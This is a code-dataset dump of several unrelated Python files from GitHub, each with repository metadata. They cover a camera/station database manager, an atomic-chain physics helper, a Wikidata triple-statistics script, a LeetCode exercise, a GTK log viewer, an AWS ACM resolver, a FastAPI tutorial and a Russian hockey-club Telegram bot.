_update_frames(self):\n try:\n select_query = 'SELECT camera_station_mappings.id, camera_station_mappings.\"cameraId\", ' + \\\n 'camera_station_mappings.\"stationId\", frames.frame_box, frames.type ' + \\\n 'FROM camera_station_mappings ' + \\\n 'LEFT JOIN frames ON camera_station_mappings.id = frames.\"cameraStationMappingId\";'\n\n self._cursor.execute(select_query)\n table = self._cursor.fetchall()\n\n for row in table:\n if row[4] == 0:\n frames = self._camera_station_frames\n else:\n frames = self._camera_weight_frames\n\n if row[1] not in frames:\n frames[row[1]] = {}\n\n if row[3] is not None:\n box_size = make_tuple(\"(\" + row[3] + \")\")\n frame_list = [box_size[1][0], box_size[1][1], box_size[0][0], box_size[0][1]]\n if row[4] == 0:\n frames[row[1]][row[2]] = frame_list\n elif row[4] == 1:\n if row[2] not in frames[row[1]]:\n frames[row[1]][row[2]] = []\n frames[row[1]][row[2]].append(frame_list)\n else:\n frames[row[1]][row[2]] = [0, 0, 1280, 720]\n\n #print(self._camera_station_frames)\n #print(self._camera_weight_frames)\n except psycopg2.Error as error:\n print(\"Error while fetching frame data from PostgreSQL\", error)\n\n def _update_camera_infos(self):\n try:\n select_query = 'SELECT cameras.id, cameras.name, cameras.type, cameras.\"typeInfo\" ' + \\\n \"FROM cameras;\"\n\n self._cursor.execute(select_query)\n table = self._cursor.fetchall()\n\n for row in table:\n self._camera_infos[row[0]] = [row[1], row[2], row[3]]\n\n\n except psycopg2.Error as error:\n print(\"Error while fetching data from PostgreSQL\", error)\n\n\n def _update_station_camera(self):\n try:\n select_query = 'SELECT id, \"cameraId\", \"stationId\" FROM camera_station_mappings'\n self._cursor.execute(select_query)\n mobile_records = self._cursor.fetchall()\n\n station_cameras = {}\n for row in mobile_records:\n if row[2] not in station_cameras:\n station_cameras[row[2]] = []\n station_cameras[row[2]].append(row[1])\n self._station_cameras = station_cameras\n except psycopg2.Error as error:\n raise RuntimeError(\"Error while fetching station/cameras from PostgreSQL\") from error\n\n def get_weight_colors(self, camera_id : int, station_id : int):\n with self._postgres_mutex:\n try:\n select_query = 'SELECT station_weight_colors.id, name, weight, hsv_low, hsv_high, \"cameraStationMappingId\" ' + \\\n 'FROM camera_station_mappings ' + \\\n 'INNER JOIN station_weight_colors ON camera_station_mappings.id=station_weight_colors.\"cameraStationMappingId\" ' + \\\n f'WHERE camera_station_mappings.\"cameraId\"={camera_id} and camera_station_mappings.\"stationId\"={station_id};'\n self._cursor.execute(select_query)\n mobile_records = self._cursor.fetchall()\n data = {}\n for record in mobile_records:\n data[record[0]] = [record[1], record[2], record[3], record[4], record[5]]\n return data\n except psycopg2.Error as error:\n raise RuntimeError(\"Error while inserting data into weight color\") from error\n\n def get_station_names(self):\n with self._postgres_mutex:\n try:\n select_query = 'SELECT id, name FROM stations;'\n self._cursor.execute(select_query)\n table = self._cursor.fetchall()\n station_names = {}\n for row in table:\n station_names[row[0]] = row[1]\n except psycopg2.Error as error:\n print(\"Error while fetching stations data from PostgreSQL\", error)\n return station_names\n\n def get_station_frame_list(self, camer_id : int):\n with self._frame_mutex:\n val = copy.deepcopy(self._camera_station_frames[camer_id])\n return val\n\n def get_station_frame_lists(self):\n with self._frame_mutex:\n val = copy.deepcopy(self._camera_station_frames)\n return val\n\n def get_weight_frame_list(self, camer_id : int):\n with self._frame_mutex:\n val = copy.deepcopy(self._camera_weight_frames[camer_id])\n return val\n\n def get_weight_frame_lists(self):\n with self._frame_mutex:\n val = copy.deepcopy(self._camera_weight_frames)\n return val\n\n def get_camera_name(self, id : int) -> str:\n with self._camera_info_mutex:\n return self._camera_infos[id][0]\n\n def get_camera_names(self) -> List[str]:\n with self._camera_info_mutex:\n camera_names = [info[0] for info in self._camera_infos.values()]\n return camera_names\n\n def get_camera_names_and_indices(self) -> List[Tuple[str, int]]:\n with self._camera_info_mutex:\n camera_indices = [(info[0], index) for index, info in self._camera_infos.items()]\n return camera_indices\n\n def get_camera_id(self, camera_name : str) -> int:\n with self._camera_info_mutex:\n print(self._camera_infos)\n for index, info in self._camera_infos.items():\n if info[0] == camera_name:\n return index\n return -1\n\n def get_camera_type(self, camera_id : int) -> int:\n with self._camera_info_mutex:\n return self._camera_infos[camera_id][1]\n\n def get_camera_type_info(self, camera_id : int) -> str:\n with self._camera_info_mutex:\n return self._camera_infos[camera_id][2]\n\n def get_cameras_of_station(self, station_id : int):\n with self._station_camera_mutex:\n return copy.deepcopy(self._station_cameras[station_id])\n\n def get_stations(self) -> Set:\n station_set = set(s for s in self._station_cameras.keys())\n return station_set\n\n def is_mongo_on(self):\n return self._mongo_is_on\n\n def get_exercises(self):\n return copy.deepcopy(self._exercises)\n\n def get_exercises_on_station(self, station_id : int):\n return copy.deepcopy(self._station_exercises[station_id])\n","repo_name":"tedseb/RWTH-UKA-Pose-estimation","sub_path":"src/station_manager/src/data_manager/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":9330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"17927384530","text":"import numpy as np\n\n# methods and procedures for creating various chains\nclass atomic_state(object):\n def __init__(self, pos, campl):\n\n self.noa = pos.shape[1]\n self._mpos = np.asarray(pos, dtype=np.float64)\n self.dim = self.noa + 2 * self.noa * (self.noa - 1)\n\n #not shuffled; run atomic_state.shuffle() for shuffling\n self.pos = self._mpos\n\n if not np.vdot(campl, campl) == 0:\n self.campl = campl / np.vdot(campl, campl)\n else:\n self.campl = campl\n\n if pos.shape[0] != 3:\n raise TypeError(\"Something wrong with the atomic state\")\n\n def __add__(self, other):\n return self.merge_atomic_states(other, distance=0)\n\n def shuffle(self):\n self.pos = self._mpos\n from .dyson_solvers import sxy, sz\n self.pos[0] += np.random.normal(0.0, sxy, self.noa)\n self.pos[1] += np.random.normal(0.0, sxy, self.noa)\n self.pos[2] += np.random.normal(0.0, sz, self.noa)\n\n def illuminate(self, V):\n amps = V(*self.pos)\n dim = self.noa + 2 * self.noa * (self.noa - 1)\n self.campl = np.zeros(dim, dtype=np.complex)\n for i in range(self.noa):\n self.campl[i] = amps[i]\n\n\n def merge_atomic_states(self, bstate: object, distance=0) -> object:\n n1, n2 = self.noa, bstate.noa\n add_dist = 0\n zpos = np.concatenate((self._mpos, bstate._mpos + distance + add_dist), axis=None)\n campl = np.concatenate((self.campl, np.exp(2j * (distance + add_dist) * np.pi) * bstate.campl), axis=None)\n return atomic_state(zpos, campl)\n\n\n# Create an atomic cloud around center\ndef new_cloud(noa:int):\n xpos = np.zeros(noa)\n ypos = np.zeros(noa)\n zpos = np.zeros(noa)\n\n poss = np.stack((xpos, ypos, zpos), axis=0)\n campl = np.ones_like(zpos, dtype=np.complex)\n\n return atomic_state(poss, campl)\n\n\n# Create a simple chain of noa atoms with period d\ndef new_chain(noa: int, d, random=False):\n xpos = np.zeros(noa)\n ypos = np.zeros(noa)\n zpos = d * (np.arange(noa) - (noa-1)/2.)\n\n poss = np.stack((xpos, ypos, zpos), axis=0)\n campl = np.ones_like(zpos, dtype=np.complex)\n\n return atomic_state(poss, campl)\n\n","repo_name":"ViacheslavP/FS_scattering","sub_path":"novelfss/atomic_states.py","file_name":"atomic_states.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"70045506646","text":"# coding: utf-8\nfrom pprint import pprint\nfrom collections import OrderedDict, defaultdict\nfrom getpass import getpass\nimport multiprocessing as mp\nimport argparse, sys, os, time, json, subprocess, re, itertools, random\nfrom common import str2bool, timewatch, multi_process\n\ntry:\n import pickle as pickle\nexcept:\n import pickle\n\n\n@timewatch\ndef read_triples(triples_path, max_rows):\n triples = defaultdict(str)\n forwards = defaultdict(list)\n backwards = defaultdict(list)\n for i, l in enumerate(open(triples_path)):\n if max_rows and i >= max_rows:\n break\n s, r, o = l.replace('\\n', '').split('\\t')\n triples[(s, o)] = r\n forwards[s].append((r, o))\n backwards[o].append((s, r))\n return triples, forwards, backwards\n\n@timewatch\ndef read_articles(articles_path, max_rows):\n articles = OrderedDict()\n for i, l in enumerate(open(articles_path)):\n if max_rows and i >= max_rows:\n break\n article = json.loads(l)\n qid = article['qid']\n articles[qid] = article\n return articles\n\n@timewatch\ndef count_triples_in_article(articles, triples, forwards, backwards):\n num_all_triples = 0\n num_mentions_related_triples = 0\n num_mentions_unrelated_triples = 0\n\n\n # Whether a triple is mentioned in an article.\n mentioned_in_article = defaultdict(bool)\n mentioned_out_of_article = defaultdict(bool)\n for s, o in triples.keys():\n mentioned_in_article[(s, o)] = False\n mentioned_out_of_article[(s, o)] = False\n \n for a_qid, article in articles.items():\n related_triples = [(a_qid, r, o) for r, o in forwards[a_qid]] + [(s, r, a_qid) for s, r in backwards[a_qid]] # triples related to a_qid and registered in wikidata\n in_article_related_triples = [] # triples related to a_qid and l_qid (the entity appearing the article).\n for l_qid in article['link']:\n rel = triples[(a_qid, l_qid)]\n if rel:\n in_article_related_triples.append((a_qid, rel, l_qid))\n\n rel = triples[(l_qid, a_qid)]\n if rel:\n in_article_related_triples.append((l_qid, rel, a_qid))\n\n for (s, r, o) in in_article_related_triples:\n mentioned_in_article[(s, o)] = True\n\n in_article_unrelated_triples = []\n for (s, o) in list(itertools.combinations(article['link'].keys(), 2)):\n rel = triples[(s, o)]\n if rel:\n in_article_unrelated_triples.append((s, rel, o))\n mentioned_out_of_article[(s, o)] = True\n\n num_mentions_unrelated_triples += len(in_article_unrelated_triples)\n\n num_all_triples += len(related_triples) # number of all the triples should be that of the entities which have an article about themselves.\n\n num_mentions_related_triples += len(in_article_related_triples)\n if len(related_triples) and (len(in_article_related_triples) or len(in_article_unrelated_triples)):\n related_triples = ' '.join(str(t) for t in related_triples)\n in_article_related_triples = ' '.join(str(t) for t in in_article_related_triples)\n in_article_unrelated_triples = ' '.join(str(t) for t in in_article_unrelated_triples)\n print ('All Triples (%s):\\t' % (a_qid), related_triples)\n print ('Related triples in article (%s):\\t' % (a_qid), in_article_related_triples)\n print ('Other triples in article (%s):\\t' % (a_qid), in_article_unrelated_triples)\n\n print ('')\n print('# all triples : %d' % num_all_triples )\n print('# mentions about the triples of main entities: %d' % num_mentions_related_triples)\n print('# mentions about the triples of sub entities: %d' % num_mentions_unrelated_triples )\n if num_all_triples:\n coverage = 100.0 * len([1 for v in mentioned_in_article.values() if v == True]) / num_all_triples\n print('Coverage of article-related triples : %.2f%%' % (coverage))\n coverage = 100.0 * len([1 for v in mentioned_out_of_article.values() if v == True]) / num_all_triples\n print('Coverage of article-unrelated triples: %.2f%%' % (coverage))\n return\n\n\n@timewatch\ndef main(args):\n #\n triples, forwards, backwards = read_triples(args.wd_source_path, args.wd_max_rows)\n #\n articles = read_articles(args.wp_source_path, args.wp_max_rows)\n count_triples_in_article(articles, triples, forwards, backwards)\n\nif __name__ == \"__main__\":\n desc = ''\n parser = argparse.ArgumentParser(description=desc)\n parser.add_argument('-wp', '--wp_source_path', default='wikipedia/latest/extracted/dumps.p1s0/pages.all.jsonlines')\n parser.add_argument('-wd', '--wd_source_path', default='wikidata/latest/extracted/all.bak/triples.txt')\n parser.add_argument('-wpm', '--wp_max_rows', default=None, type=int)\n parser.add_argument('-wdm', '--wd_max_rows', default=None, type=int)\n args = parser.parse_args()\n main(args)\n\n# All triples: 97511494\n# All articles: 2303363\n","repo_name":"jack-and-rozz/wikipedia-scripts","sub_path":"supplemental/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":4726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"8175225469","text":"'''\nYou are given an array prices where prices[i] is the price of a given stock on the ith day.\n\nYou want to maximize your profit by choosing a single day to buy one stock and choosing a different day in the future to sell that stock.\n\nReturn the maximum profit you can achieve from this transaction. If you cannot achieve any profit, return 0.\n'''\n\n'''\nslide window recipe: initial result,initial the beginning of the window,, then for+if/while\nSliding window uses one pointer and one variable for the window size to find a window within the sequence.\n'''\n# Joanna solution. It's wrong. \ndef bestTimeBuyStock(arr):\n maxProfit=0 #initial result\n l=0 #initial the beginning of the window,\n for l in range(len(arr)): #update the pointer to a new location\n for r in range(len(arr)):\n while arr[r] int:\n res = 0\n l = arry[0]\n for r in arry:\n if r < l:\n l = r\n res = max(res, r - l)\n return res\n\ndef main():\n print(bestTimeBuyStock([7,1,5,3,6,4]))\n print(maxProfit([7,1,5,3,6,4]))\n#[3,2,12,6], \n\nif __name__=='__main__':\n main()\n\n","repo_name":"joanna-shu-wu/LeetCode","sub_path":"python/Slide Window/bestTimeBuyStock.py","file_name":"bestTimeBuyStock.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"6660419225","text":"import gtk\nimport os\nfrom cylc.gui.tailer import Tailer\nfrom cylc.gui.warning_dialog import warning_dialog\nimport pango\n\n\nclass logviewer(object):\n def __init__(self, name, dirname, filename):\n self.name = name\n self.dirname = dirname\n self.filename = filename\n self.t = None\n\n self.find_current = None\n self.find_current_iter = None\n self.search_warning_done = False\n\n self.freeze_button = None\n self.log_label = None\n self.logview = None\n self.hbox = None\n self.vbox = None\n self.create_gui_panel()\n self.logview.get_buffer()\n\n self.connect()\n\n def clear_and_reconnect(self):\n self.t.stop()\n self.clear()\n self.connect()\n\n def clear(self):\n logbuffer = self.logview.get_buffer()\n s, e = logbuffer.get_bounds()\n logbuffer.delete(s, e)\n\n def path(self):\n if self.dirname and not os.path.isabs(self.filename):\n return os.path.join(self.dirname, self.filename)\n else:\n return self.filename\n\n def connect(self):\n self.t = Tailer(self.logview, self.path())\n self.t.start()\n\n def quit_w_e(self, w, e):\n self.t.stop()\n\n def quit(self):\n self.t.stop()\n\n def get_widget(self):\n return self.vbox\n\n def reset_logbuffer(self):\n # clear log buffer iters and tags\n logbuffer = self.logview.get_buffer()\n s, e = logbuffer.get_bounds()\n logbuffer.remove_all_tags(s, e)\n self.find_current_iter = None\n self.find_current = None\n\n def enter_clicked(self, e, tv):\n self.on_find_clicked(tv, e)\n\n def on_find_clicked(self, tv, e):\n needle = e.get_text()\n if not needle:\n return\n\n self.t.freeze = True\n self.freeze_button.set_active(True)\n self.freeze_button.set_label('Reconnect')\n if not self.search_warning_done:\n warning_dialog(\n \"Find Next disconnects the live feed;\" +\n \" click Reconnect when you're done\").warn()\n self.search_warning_done = True\n\n tb = tv.get_buffer()\n\n if needle == self.find_current:\n s = self.find_current_iter\n else:\n s, e = tb.get_bounds()\n tb.remove_all_tags(s, e)\n s = tb.get_end_iter()\n tv.scroll_to_iter(s, 0)\n try:\n start, end = s.backward_search(needle, gtk.TEXT_SEARCH_TEXT_ONLY)\n except TypeError:\n # No search results.\n warning_dialog('\"' + needle + '\"' + \" not found\").warn()\n else:\n tag = tb.create_tag(None, background=\"#70FFA9\")\n tb.apply_tag(tag, start, end)\n self.find_current_iter = start\n self.find_current = needle\n tv.scroll_to_iter(start, 0)\n\n def freeze_log(self, b):\n # TODO - HANDLE MORE STUFF IN THREADS LIKE THIS, RATHER THAN\n # PASSING IN ARGUMENTS?\n if b.get_active():\n self.t.freeze = True\n b.set_label('Re_connect')\n self.reset_logbuffer()\n else:\n self.t.freeze = False\n b.set_label('Dis_connect')\n\n return False\n\n def create_gui_panel(self):\n self.logview = gtk.TextView()\n self.logview.set_editable(False)\n # Use a monospace font. This is safe - by testing - setting an\n # illegal font description has no effect.\n self.logview.modify_font(pango.FontDescription(\"monospace\"))\n\n searchbox = gtk.HBox()\n entry = gtk.Entry()\n entry.connect(\"activate\", self.enter_clicked, self.logview)\n searchbox.pack_start(entry, True)\n b = gtk.Button(\"Find Next\")\n b.connect_object('clicked', self.on_find_clicked, self.logview, entry)\n searchbox.pack_start(b, False)\n\n self.hbox = gtk.HBox()\n\n self.freeze_button = gtk.ToggleButton(\"Dis_connect\")\n self.freeze_button.set_active(False)\n self.freeze_button.connect(\"toggled\", self.freeze_log)\n\n searchbox.pack_end(self.freeze_button, False)\n\n sw = gtk.ScrolledWindow()\n sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)\n sw.add(self.logview)\n self.logview.set_border_width(5)\n self.logview.modify_bg(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"#fff\"))\n\n self.vbox = gtk.VBox()\n\n self.log_label = gtk.Label(self.path())\n self.log_label.modify_fg(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"#00a\"))\n self.vbox.pack_start(self.log_label, False)\n\n self.vbox.pack_start(sw, True)\n self.vbox.pack_start(searchbox, False)\n self.vbox.pack_start(self.hbox, False)\n","repo_name":"NancyGomez/WebBasedCylc","sub_path":"cylc-7.6.0/lib/cylc/gui/logviewer.py","file_name":"logviewer.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"30"} +{"seq_id":"71437994966","text":"# -*- coding: utf-8 -*-\nfrom sceptre.resolvers import Resolver\nfrom sceptre.exceptions import InvalidHookArgumentSyntaxError\nfrom uc3_sceptre_utils.util import acm\n\nDEFAULT_REGION = 'us-east-1'\n\n\nclass AcmCertificateArn(Resolver):\n \"\"\"\n Returns a AWS ACM certificate ARN given a domain name and a\n AWS region. The region can be omitted in which case it defaults\n to 'us-east-1'.\n\n Example sceptre config usage:\n\n CertARN: !acm_certificate_arn ashley-demo.example.com us-west-2\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(AcmCertificateArn, self).__init__(*args, **kwargs)\n\n def resolve(self):\n if len(self.argument.split()) == 2:\n cert_fqdn, region = self.argument.split()\n elif len(self.argument.split()) == 1:\n cert_fqdn = self.argument\n region = DEFAULT_REGION\n else:\n raise InvalidHookArgumentSyntaxError(\n '{}: resolver requires either one or two positional parameters: '\n 'cert_fqdn [region]'.format(__name__)\n )\n\n arn = acm.get_cert_arn(cert_fqdn, region)\n if not arn:\n arn = str()\n self.logger.debug('{} - certificate_arn: {}'.format(__name__, arn))\n return arn\n","repo_name":"CDLUC3/uc3-sceptre-utils","sub_path":"uc3_sceptre_utils/resolvers/acm_certificate_arn.py","file_name":"acm_certificate_arn.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"28291139625","text":"'''\nA request body is data sent by the client to your API. A response body is the data your API sends to the client. \nYour API almost always has to send a response body. But clients don’t necessarily need to send request bodies all \nthe time.\n'''\n# Request body using pydantic\n\nfrom typing import Optional\n\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n name: str\n description: Optional[str] = None\n price: float\n tax: Optional[float] = None\n\n# description and tax are optional because they have a default value of None. A json object without these two fields are also valid.\n\napp = FastAPI()\n\n# Adding the new pydantic model to the path operation as a parameter\n\n@app.post(\"/items/\")\nasync def create_item(item: Item):\n return item\n\n\n# Receiving what is in function instead of dict\n@app.post(\"/itemsupdt/\")\nasync def create_item(item: Item):\n item_dict = item.model_dump()\n if item.tax:\n price_with_tax = item.price + item.tax\n item_dict.update({\"price_with_tax\": price_with_tax})\n return item_dict\n\n# Declare path parameters and a request body at the same time\n@app.put(\"/items/{item_id}\")\nasync def create_item(item_id: int, item: Item):\n return {\"item_id\": item_id, **item.model_dump()}\n","repo_name":"priyankarnd/All-Python","sub_path":"FastAPI/request_body.py","file_name":"request_body.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"30"} +{"seq_id":"73605052883","text":"import re\nfrom datetime import datetime, timedelta\nfrom typing import List\n\nfrom aiogram import types\nfrom aiogram.dispatcher import FSMContext\n\nfrom bot import django_crud as dj\nfrom bot.config import ADM_ID, DEV_ID\nfrom bot.dialogue_utils import (send_dialogue_message,\n send_dialogue_message_with_media)\nfrom bot.loader import dp, bot\nfrom bot.states import Adm_State, Dialogue_State, StartState, CahngeProfileState\nfrom bot.utils import user_notification, game_notification\n\n\nasync def main_menu_message(msg):\n message = '''Доброе пожаловать в ХК \"Катюша\"!\n\nЕсли Вы уже посещали наши тренировки, выберите - \"Войти\".\nВ ином случае выберите - \"Регистрация\"\n'''\n sign_in_button = types.InlineKeyboardButton('Войти', callback_data='sign_in_button')\n sign_up_button = types.InlineKeyboardButton('Регистрация', callback_data='sign_up_button')\n keyboard = types.InlineKeyboardMarkup().row(sign_in_button, sign_up_button)\n await msg.answer(message, reply_markup=keyboard)\n\n#приветстви только новых пользователей бота\n@dp.message_handler(commands=['start'])\nasync def start(msg: types.Message):\n if msg.from_user.id == ADM_ID or msg.from_user.id == DEV_ID:\n button_1 = types.KeyboardButton('Запись на тренировку 🏒')\n button_2 = types.KeyboardButton('Оценки тренировок 📊')\n button_3 = types.KeyboardButton('Рупор 📢')\n button_4 = types.KeyboardButton('Запись на игру 🎮')\n keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True)\n keyboard.row(button_4, button_1)\n keyboard.row(button_3, button_2)\n await msg.answer('Добро пожаловать! Админ-мод включен.', reply_markup=keyboard)\n else:\n tg_id = await dj.check_new_user(msg.from_user.id)\n if not tg_id:\n await main_menu_message(msg)\n\n@dp.message_handler(commands=['schedule'])\nasync def show_shedule(msg: types.Message):\n trainings_data = await dj.get_shedule()\n message = '''\nТренировки на эту неделю:\n\n\n'''\n day_order = {'Понедельник': 1, 'Вторник': 2, 'Среда': 3, 'Четверг': 4, \n 'Пятница': 5, 'Суббота': 6, 'Воскресенье': 7}\n sorted_trainings_data = sorted(trainings_data, key=lambda x: day_order.get(x['day'], float('inf')))\n for data in sorted_trainings_data:\n day = data.get('day')\n time = data.get('time')\n place = data.get('place')\n address = data.get('address')\n message += f'{day} {time} - {place} | {address}\\n\\n'\n \n await msg.answer(message)\n\n#диалог с тренером\n@dp.message_handler(commands=['dialogue'])\nasync def start_dialogue(msg: types.Message):\n if msg.from_user.id == ADM_ID:\n await msg.answer('Эта функция доступна только игрокам.')\n return\n message = '''\nРежим диалога включён.\nВсё, что Вы напишите, будет ��тправлено тренеру ХК \"Катюша\".\nЧтобы выйти из диалога воспользуйтесь командой /stop_dialogue.\n'''\n await msg.answer(message)\n await Dialogue_State.start.set()\n\n@dp.message_handler(commands=['stop_dialogue'], state=Dialogue_State.start)\nasync def cancel_dialogue(msg: types.Message, state: FSMContext):\n if msg.from_user.id == ADM_ID:\n await msg.answer('Эта функция доступна только игрокам.')\n return\n await msg.answer('Режим диалога выключен.')\n await state.finish()\n\n@dp.message_handler(commands=['training_today'])\nasync def get_training_info(msg: types.Message):\n user_data = await dj.check_new_user(msg.from_user.id)\n if not user_data:\n await msg.answer('Войдите в профиль или зарегистрируйтесь')\n return\n if msg.from_user.id == ADM_ID:\n await msg.answer('Эта команда для игроков')\n return\n trainings_data = await dj.get_training_info()\n if not trainings_data:\n await msg.answer('Тренировок для записи нет.')\n return\n if trainings_data == 'not today':\n await msg.answer('На сегодня тренировок нет')\n return\n if len(trainings_data) == 1:\n await user_notification({'id': msg.from_user.id, 'first_not': True} ,trainings_data[0], 'today')\n else:\n message = 'Выберите тренировку\\n\\n'\n count = 1\n keyboard = types.InlineKeyboardMarkup()\n for training in trainings_data:\n id = training.get('id')\n time = training.get('time').strftime('%H:%M')\n address = training.get('address')\n place = training.get('place')\n if training.get('day') == 'friday':\n training_type = '( *игровая тренировка* )'\n else:\n training_type = '( *тренировка* )'\n button = types.InlineKeyboardButton(f'{count}) {time}', callback_data=f'select_training_{id}')\n keyboard.add(button)\n message += f'''{count})\n🕖Лёд в {time}{training_type} \n🏟Стадион: {place} \n{address}\n\n'''\n count += 1\n await msg.answer(message, reply_markup=keyboard)\n\n@dp.callback_query_handler(lambda call: call.data.startswith('select_training_'))\nasync def show_selected_training(call: types.CallbackQuery):\n await call.message.delete()\n training_id = call.data.split('_')[2]\n trainings_data = await dj.get_training_info(id=training_id)\n if not trainings_data or trainings_data == 'not today':\n await call.message.answer('Кажется, запись на тренировку завершена.')\n return\n await user_notification({'id': call.from_user.id, 'first_not': True} , trainings_data[0], 'today')\n\nasync def get_user_profile(msg):\n user_data = await dj.check_new_user(msg.from_user.id)\n if not user_data:\n await msg.answer('Войдите в профиль или зарегистрируйтесь')\n return\n name = user_data.name\n phone = user_data.tel_number\n birthday = user_data.birthday.strftime('%d.%m.%Y')\n message = f'''\nФИО: {name}\nНомер телефона: {phone}\nДень рождения: {birthday}\n\nЧто желаете изменить?\n'''\n change_name_button = types.InlineKeyboardButton('ФИО', callback_data='change_button_name')\n change_phone_button = types.InlineKeyboardButton('Номер телефона', callback_data='change_button_phone')\n change_birthday_button = types.InlineKeyboardButton('День рождения', callback_data='change_button_birthday')\n keyboard = types.InlineKeyboardMarkup().row(change_name_button, change_phone_button).add(change_birthday_button)\n await msg.answer(message, reply_markup=keyboard)\n\n@dp.message_handler(commands=['games'])\nasync def game_info(msg: types.Message):\n user_data = await dj.check_new_user(msg.from_user.id)\n if not user_data:\n await msg.answer('Войдите в профиль или зарегистрируйтесь')\n return\n if msg.from_user.id == ADM_ID:\n await msg.answer('Эта команда для игроков')\n return\n games_data = await dj.check_games(msg.from_user.id)\n if not games_data:\n await msg.answer('На данный момент нет игр для записи.')\n return\n message = 'Выберите игру:\\n\\n'\n count = 1\n keyboard = types.InlineKeyboardMarkup()\n for game in games_data:\n data_time = game.date_time.strftime('%d.%m.%Y %H:%M')\n game_info = f'{count}) {game.place} {game.address} {data_time}\\n'\n message += game_info\n button = types.InlineKeyboardButton(f'{count}) {game.place}', callback_data=f'select_game_{game.id}')\n keyboard.add(button)\n count += 1\n await msg.answer(message, reply_markup=keyboard)\n\n@dp.callback_query_handler(lambda call: call.data.startswith('select_game'))\nasync def select_game(call: types.CallbackQuery):\n await call.message.delete()\n game_id = call.data.split('_')[2]\n game_data = await dj.get_game_data(game_id, call.from_user.id)\n if not game_data:\n await call.message.answer('Кажется, запись на игру завершена.')\n return\n await game_notification(game_data.get('user'), game_data.get('game'), was_call=True)\n\n\n@dp.message_handler(commands=['my_profile'])\nasync def get_training_info(msg: types.Message):\n if msg.from_user.id == ADM_ID:\n await msg.answer('Эта команда для игроков')\n return\n await get_user_profile(msg)\n\n@dp.callback_query_handler(lambda call: call.data.startswith('change_button'))\nasync def change_data(call: types.CallbackQuery):\n await call.message.delete()\n data_for_change = call.data.split('_')[2]\n if data_for_change == 'name':\n await call.message.answer('Напишите ФИО')\n await CahngeProfileState.name.set()\n if data_for_change == 'phone':\n await call.message.answer('Напишите номер телефона в формате: 89000000000(числа подряд)')\n await CahngeProfileState.phone_number.set()\n if data_for_change == 'birthday':\n await call.message.answer('Напишите день рождения в формате: 01.01.1970')\n await CahngeProfileState.birthday.set()\n \n\n@dp.message_handler(state=CahngeProfileState.name)\nasync def change_name(msg: types.Message, state: FSMContext):\n await dj.change_name(msg.from_user.id, msg.text)\n await msg.answer('Имя изменено')\n await get_user_profile(msg)\n await state.finish()\n\n@dp.message_handler(state=CahngeProfileState.phone_number)\nasync def change_phone(msg: types.Message, state: FSMContext):\n if msg.text.isdigit() and len(msg.text) == 11:\n await dj.change_phone(msg.from_user.id, msg.text)\n await msg.answer('Номер телефона изменен')\n await get_user_profile(msg)\n await state.finish()\n else:\n await msg.answer('Неверный формат. Повторите ввод.')\n\n@dp.message_handler(state=CahngeProfileState.birthday)\nasync def change_birthday(msg: types.Message, state: FSMContext):\n regex = r\"\\d{2}\\.\\d{2}\\.\\d{4}\"\n if not re.search(regex, msg.text):\n await msg.answer('Неверный формат даты. Повторите ввод.', reply_markup=cancel_reg_keyboard())\n return\n date_object = datetime.strptime(msg.text, \"%d.%m.%Y\")\n birthday = date_object.strftime(\"%Y-%m-%d\")\n await dj.change_birthday(msg.from_user.id, birthday)\n await msg.answer('Дата рождения изменена')\n await get_user_profile(msg)\n await state.finish()\n\n\n@dp.message_handler(is_media_group=False,\n content_types=['text', 'audio', 'document', 'sticker', 'photo', \n 'video', 'voice', 'contact', 'location'],\n state=Dialogue_State.start)\nasync def dialog_handler(msg: types.Message):\n await send_dialogue_message(msg)\n\n\n@dp.message_handler(is_media_group=True, content_types=['audio', 'document', 'photo', 'video'],\n state=Dialogue_State.start)\nasync def dialog_handler_media(msg: types.Message, album: List[types.Message]):\n await send_dialogue_message_with_media(msg,album)\n\n#для разбивки крупного сообщения\ndef split_message(message, max_length=4096):\n \"\"\"Разбивает сообщение на части, не превышающие max_length символов.\"\"\"\n return [message[i:i+max_length] for i in range(0, len(message), max_length)]\n\nasync def show_users_training(msg, training_id):\n data = await dj.get_accept_users(training_id)\n if not data:\n await msg.answer('Ещё никто не записался')\n return\n training_data = data.get('training_data')\n place = training_data.get('place')\n address = training_data.get('address')\n time = training_data.get('time').strftime('%H:%M')\n message1 = f'''{place}\n{address}\n{time}\n\nУже записались:\n \n'''\n message2 = '''\n\nПередумали и отказались:\n\n'''\n counter1 = 0\n counter2 = 0\n for user in data.get('users_data'):\n name = user.get('name')\n birthday = user.get('birthday')\n newbie = user.get('newbie')\n if user.get('changed'):\n counter2 += 1\n message2 += f'❌ {counter2}) {name} {birthday} {newbie}\\n'\n else:\n counter1 += 1\n message1 += f'✅ {counter1}) {name} {birthday} {newbie}\\n'\n\n\n message = message1 + message2\n try:\n await msg.answer(message)\n except Exception as e:\n if str(e) == 'Message is too long':\n parts = split_message(message, max_length=4096)\n for part in parts:\n await msg.answer(part)\n\nasync def show_users_game(users_data, msg):\n if not users_data:\n await msg.answer('Ещё никто не записался')\n return\n team = users_data[0].get('team')\n game = users_data[0].get('game')\n game_date_time = game.date_time.strftime('%d.%m.%Y %H:%M')\n message1 = f'''Команда: {team}\nИгра: {game.place} {game.address} 